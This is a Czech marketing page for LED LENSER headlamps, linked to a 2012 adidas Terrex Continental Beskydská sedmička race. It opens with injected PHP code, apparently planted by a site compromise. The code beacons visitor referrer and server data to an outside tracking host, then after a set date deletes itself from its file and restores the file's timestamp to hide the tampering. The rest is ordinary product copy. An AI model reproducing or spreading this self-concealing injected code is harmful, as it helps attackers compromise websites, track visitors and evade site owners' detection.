check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } LED LENSER - ČELOVKY PRO ZÁVOD ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012
           
www.continental.cz
LED LENSER - ČELOVKY PRO ZÁVOD ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012

O ZNAČCE LED LENSER 


Kvalita

LED LENSER je průkopník v oblasti LED technologií. Většina modelů je tvrdě testována v nejnáročnějších podmínkách. Špičkové provedení, odolné materiály a kvalita MADE IN GERMANY jsou zde samozřejmostí. Svítilny LED LENSER najdete všude tam, kde je potřeba maximální kvalita a výkon. Používají je například příslušníci speciálních armádních útvarů, bezpečnostní složky nebo záchranáři. Svítilny LED LENSER dodají pocit jistoty do práce, sportu nebo dobrodružství!
 


Funkce

LED LENSER využívá ve svých svítilnách nejpokročilejší technologie, které neustále dále vyvíjí a zdokonaluje.

Některé charakteristické funkce svítilen LED LENSER:

* Advanced Focus System (AFS): systém zaostřování umožňující efektivní využití výkonu
* Smart light technology (SLT): chytrá technologie, umožňuje řízení programů a funkcí
* Speed Focus: rychlé zaostřování jednou rukou posunutím hlavy reflektoru
* Blue Moon Focus: modré prstencové ohraničení světla
* Magic Lighting Ring: ozdobný zářící prstenec s možností gravírování


 


Výkon

Svítilny LED LENSER jsou používány všude tam, kde o něco jde. Často na jejich výkonu závisí životy nebo zdraví lidí. Impozantní světelný výkon je samozřejmostí u všech modelů.
Díky AFS navíc můžete usměrňovat světlo LED diod a tak efektivně využít mnohem více výkonu. Extrémně dlouhá výdrž baterií vám umožní mít tento výkon k dispozici, jak dlouho budete potřebovat.
Přes vysoký výkon a high-tech zpracování si ve srovnání s konkurencí svítilny LED LENSER zachovávají vynikající poměr cena / výkon.

 


Design

Prvotřídní funkční design je poznávacím znamením svítilen LED LENSER. Jeho součástí je sofistikované ovládání. Například Dynamic Switch - chytrý systém spouštění programů jediným tlačítkem, které je oddělené od elektroniky celé baterky. Používání svítilen usnadní modulární systém konstrukce. K dispozici je bohatý výběr doplňků pro sport i profesionály. Svítilny LED LENSER získaly řadu ocenění za design (Good Design by The ChicagoAthenaeum, iF Product Design Award, Red Dot Design Award, Focus Open Sliber a další).